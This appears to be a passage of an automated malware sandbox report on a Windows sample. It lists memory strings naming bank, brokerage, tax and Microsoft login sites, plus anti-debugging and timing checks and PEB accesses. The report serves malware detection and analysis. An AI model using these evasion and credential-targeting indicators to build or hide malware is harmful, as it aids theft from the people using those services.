Source: c6Sz--24-.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: c6Sz--24-.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: c6Sz--24-.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: firefox.exe, 0000000D.00000002.2705481251.00000132C3E4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: c6Sz--24-.10.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: c6Sz--24-.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: c6Sz--24-.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: c6Sz--24-.10.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: c6Sz--24-.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: AtBroker.exe, 0000000A.00000002.3321572737.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX%}
Source: c6Sz--24-.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: c6Sz--24-.10.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: c6Sz--24-.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: c6Sz--24-.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Code function: 6_2_0125096E rdtsc

6_2_0125096E

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Code function: 6_2_00417C83 LdrLoadDll,

6_2_00417C83

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01240124 mov eax, dword ptr fs:[00000030h]	6_2_01240124
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BA118 mov ecx, dword ptr fs:[00000030h]	6_2_012BA118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BA118 mov eax, dword ptr fs:[00000030h]	6_2_012BA118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BA118 mov eax, dword ptr fs:[00000030h]	6_2_012BA118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012BA118 mov eax, dword ptr fs:[00000030h]	6_2_012BA118
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D0115 mov eax, dword ptr fs:[00000030h]	6_2_012D0115
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A4144 mov eax, dword ptr fs:[00000030h]	6_2_012A4144
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A4144 mov eax, dword ptr fs:[00000030h]	6_2_012A4144
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A4144 mov ecx, dword ptr fs:[00000030h]	6_2_012A4144
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A4144 mov eax, dword ptr fs:[00000030h]	6_2_012A4144
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A4144 mov eax, dword ptr fs:[00000030h]	6_2_012A4144
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A8158 mov eax, dword ptr fs:[00000030h]	6_2_012A8158
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216154 mov eax, dword ptr fs:[00000030h]	6_2_01216154
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216154 mov eax, dword ptr fs:[00000030h]	6_2_01216154
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120C156 mov eax, dword ptr fs:[00000030h]	6_2_0120C156
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01250185 mov eax, dword ptr fs:[00000030h]	6_2_01250185
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CC188 mov eax, dword ptr fs:[00000030h]	6_2_012CC188
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CC188 mov eax, dword ptr fs:[00000030h]	6_2_012CC188
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B4180 mov eax, dword ptr fs:[00000030h]	6_2_012B4180
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B4180 mov eax, dword ptr fs:[00000030h]	6_2_012B4180
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129019F mov eax, dword ptr fs:[00000030h]	6_2_0129019F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129019F mov eax, dword ptr fs:[00000030h]	6_2_0129019F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129019F mov eax, dword ptr fs:[00000030h]	6_2_0129019F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129019F mov eax, dword ptr fs:[00000030h]	6_2_0129019F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A197 mov eax, dword ptr fs:[00000030h]	6_2_0120A197
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A197 mov eax, dword ptr fs:[00000030h]	6_2_0120A197
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A197 mov eax, dword ptr fs:[00000030h]	6_2_0120A197
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012E61E5 mov eax, dword ptr fs:[00000030h]	6_2_012E61E5
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012401F8 mov eax, dword ptr fs:[00000030h]	6_2_012401F8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D61C3 mov eax, dword ptr fs:[00000030h]	6_2_012D61C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D61C3 mov eax, dword ptr fs:[00000030h]	6_2_012D61C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0128E1D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0128E1D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0128E1D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0128E1D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0128E1D0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A020 mov eax, dword ptr fs:[00000030h]	6_2_0120A020
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120C020 mov eax, dword ptr fs:[00000030h]	6_2_0120C020
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A6030 mov eax, dword ptr fs:[00000030h]	6_2_012A6030
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01294000 mov ecx, dword ptr fs:[00000030h]	6_2_01294000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B2000 mov eax, dword ptr fs:[00000030h]	6_2_012B2000
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E016 mov eax, dword ptr fs:[00000030h]	6_2_0122E016
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E016 mov eax, dword ptr fs:[00000030h]	6_2_0122E016
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E016 mov eax, dword ptr fs:[00000030h]	6_2_0122E016
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E016 mov eax, dword ptr fs:[00000030h]	6_2_0122E016
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123C073 mov eax, dword ptr fs:[00000030h]	6_2_0123C073
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01212050 mov eax, dword ptr fs:[00000030h]	6_2_01212050
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01296050 mov eax, dword ptr fs:[00000030h]	6_2_01296050
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A80A8 mov eax, dword ptr fs:[00000030h]	6_2_012A80A8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D60B8 mov eax, dword ptr fs:[00000030h]	6_2_012D60B8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012D60B8 mov ecx, dword ptr fs:[00000030h]	6_2_012D60B8
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121208A mov eax, dword ptr fs:[00000030h]	6_2_0121208A
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0120A0E3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012180E9 mov eax, dword ptr fs:[00000030h]	6_2_012180E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012960E0 mov eax, dword ptr fs:[00000030h]	6_2_012960E0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0120C0F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012520F0 mov ecx, dword ptr fs:[00000030h]	6_2_012520F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012920DE mov eax, dword ptr fs:[00000030h]	6_2_012920DE
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A30B mov eax, dword ptr fs:[00000030h]	6_2_0124A30B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A30B mov eax, dword ptr fs:[00000030h]	6_2_0124A30B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124A30B mov eax, dword ptr fs:[00000030h]	6_2_0124A30B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120C310 mov ecx, dword ptr fs:[00000030h]	6_2_0120C310
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01230310 mov ecx, dword ptr fs:[00000030h]	6_2_01230310
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B437C mov eax, dword ptr fs:[00000030h]	6_2_012B437C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01292349 mov eax, dword ptr fs:[00000030h]	6_2_01292349
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov eax, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov eax, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov eax, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov ecx, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov eax, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0129035C mov eax, dword ptr fs:[00000030h]	6_2_0129035C
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B8350 mov ecx, dword ptr fs:[00000030h]	6_2_012B8350
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012DA352 mov eax, dword ptr fs:[00000030h]	6_2_012DA352
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E388 mov eax, dword ptr fs:[00000030h]	6_2_0120E388
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E388 mov eax, dword ptr fs:[00000030h]	6_2_0120E388
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120E388 mov eax, dword ptr fs:[00000030h]	6_2_0120E388
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123438F mov eax, dword ptr fs:[00000030h]	6_2_0123438F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0123438F mov eax, dword ptr fs:[00000030h]	6_2_0123438F
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01208397 mov eax, dword ptr fs:[00000030h]	6_2_01208397
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01208397 mov eax, dword ptr fs:[00000030h]	6_2_01208397
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01208397 mov eax, dword ptr fs:[00000030h]	6_2_01208397
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012203E9 mov eax, dword ptr fs:[00000030h]	6_2_012203E9
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0122E3F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0122E3F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0122E3F0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012463FF mov eax, dword ptr fs:[00000030h]	6_2_012463FF
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012CC3CD mov eax, dword ptr fs:[00000030h]	6_2_012CC3CD
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0121A3C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012183C0 mov eax, dword ptr fs:[00000030h]	6_2_012183C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012183C0 mov eax, dword ptr fs:[00000030h]	6_2_012183C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012183C0 mov eax, dword ptr fs:[00000030h]	6_2_012183C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012183C0 mov eax, dword ptr fs:[00000030h]	6_2_012183C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012963C0 mov eax, dword ptr fs:[00000030h]	6_2_012963C0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B43D4 mov eax, dword ptr fs:[00000030h]	6_2_012B43D4
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012B43D4 mov eax, dword ptr fs:[00000030h]	6_2_012B43D4
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120823B mov eax, dword ptr fs:[00000030h]	6_2_0120823B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214260 mov eax, dword ptr fs:[00000030h]	6_2_01214260
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214260 mov eax, dword ptr fs:[00000030h]	6_2_01214260
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01214260 mov eax, dword ptr fs:[00000030h]	6_2_01214260
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120826B mov eax, dword ptr fs:[00000030h]	6_2_0120826B
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012C0274 mov eax, dword ptr fs:[00000030h]	6_2_012C0274
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01298243 mov eax, dword ptr fs:[00000030h]	6_2_01298243
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01298243 mov ecx, dword ptr fs:[00000030h]	6_2_01298243
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0120A250 mov eax, dword ptr fs:[00000030h]	6_2_0120A250
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01216259 mov eax, dword ptr fs:[00000030h]	6_2_01216259
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012202A0 mov eax, dword ptr fs:[00000030h]	6_2_012202A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012202A0 mov eax, dword ptr fs:[00000030h]	6_2_012202A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov eax, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov ecx, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov eax, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov eax, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov eax, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012A62A0 mov eax, dword ptr fs:[00000030h]	6_2_012A62A0
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E284 mov eax, dword ptr fs:[00000030h]	6_2_0124E284
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0124E284 mov eax, dword ptr fs:[00000030h]	6_2_0124E284
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01290283 mov eax, dword ptr fs:[00000030h]	6_2_01290283
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01290283 mov eax, dword ptr fs:[00000030h]	6_2_01290283
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01290283 mov eax, dword ptr fs:[00000030h]	6_2_01290283
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012202E1 mov eax, dword ptr fs:[00000030h]	6_2_012202E1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012202E1 mov eax, dword ptr fs:[00000030h]	6_2_012202E1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_012202E1 mov eax, dword ptr fs:[00000030h]	6_2_012202E1
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0121A2C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0121A2C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0121A2C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0121A2C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_0121A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0121A2C3
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Code function: 6_2_01220535 mov eax, dword ptr fs:[00000030h]	6_2_01220535
